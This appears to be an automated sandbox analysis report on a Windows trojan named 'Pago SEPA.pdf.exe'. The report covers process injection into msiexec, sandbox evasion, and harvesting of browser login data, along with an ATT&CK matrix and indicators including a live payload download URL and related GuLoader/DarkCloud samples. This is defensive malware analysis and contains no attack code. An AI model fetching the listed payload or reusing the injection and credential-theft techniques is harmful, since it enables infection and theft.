    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6561Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3198Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: WebData.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: WebData.6.drBinary or memory string: discord.comVMware20,11696428655f
    Source: WebData.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: WebData.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: WebData.6.drBinary or memory string: global block list test formVMware20,11696428655
    Source: WebData.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: msiexec.exe, 00000006.00000003.2741999478.0000000006CA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctivebrokers.co.inVMware20,11696428655d
    Source: WebData.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: WebData.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: WebData.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: WebData.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: WebData.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: WebData.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: WebData.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: WebData.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
    Source: WebData.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: WebData.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: WebData.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
    Source: WebData.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: WebData.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: WebData.6.drBinary or memory string: AMC password management pageVMware20,11696428655
    Source: WebData.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
    Source: WebData.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: WebData.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: WebData.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
    Source: WebData.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: WebData.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
    Source: WebData.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: WebData.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: WebData.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
    Source: WebData.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: WebData.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3302
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0479F288 LdrInitializeThunk,LdrInitializeThunk,2_2_0479F288
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Early bird code injection technique detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Queues an APC in another process (thread injection)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C00000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406041

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		11
    Masquerading    		1
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
    Process Injection    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol1
    Data from Local System    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin Shares1
    Clipboard Data    		2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture12
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Obfuscated Files or Information    		LSA Secrets1
    System Network Configuration Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Software Packing    		Cached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync14
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Pago SEPA.pdf.exe47%ReversingLabsWin32.Trojan.Generic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://showip.net/W0%Avira URL Cloudsafe
    http://104.168.32.140/jUPSCuLd221.bin0%Avira URL Cloudsafe
    https://go.microsoftB0%Avira URL Cloudsafe
    http://showip.net/g0%Avira URL Cloudsafe
    https://go.microsoftBranchCache.psd1as0%Avira URL Cloudsafe
    http://showip.netll0%Avira URL Cloudsafe
    http://www.microsoft.-h0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    showip.net
    		162.55.60.2
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://104.168.32.140/jUPSCuLd221.binfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://duckduckgo.com/ac/?q=msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://showip.net/msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://unpkg.com/leafletmsiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://showip.net/?checkip=msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorPago SEPA.pdf.exefalse
                                    		high
                                    https://www.ecosia.org/newtab/msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://showip.net/msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://showip.netmsiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.microsoftBranchCache.psd1aspowershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.microsoft.-hpowershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://showip.netllmsiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schema.orgmsiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micropowershell.exe, 00000002.00000002.2593527017.0000000007510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://showip.net/Wmsiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.openstreetmap.org/copyrightmsiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.maxmind.commsiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.microsoft.cpowershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://showip.net/gmsiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://go.microsoftBpowershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.168.32.140
                                                                    		unknownUnited States
                                                                    		36352AS-COLOCROSSINGUSfalse
                                                                    162.55.60.2
                                                                    		showip.netUnited States
                                                                    		35893ACPCAfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1556579
                                                                    Start date and time:2024-11-15 17:19:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 30s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Pago SEPA.pdf.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/13@1/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 33.3%
                                                                    HCA Information:
                                                                    • Successful, ratio: 95%
                                                                    • Number of executed functions: 99
                                                                    • Number of non-executed functions: 39
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6508 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: Pago SEPA.pdf.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    11:20:05API Interceptor39x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.168.32.140Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 104.168.32.140/hgzYyfcbupQbJOAKN230.bin
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 104.168.32.140/hgzYyfcbupQbJOAKN230.bin
                                                                    162.55.60.2Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • showip.net/
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • showip.net/
                                                                    FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    7rxE4s9EEG.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    fS5TEjVseD.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    Nvojocm.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    Documentos_xlsm.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    showip.netLista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
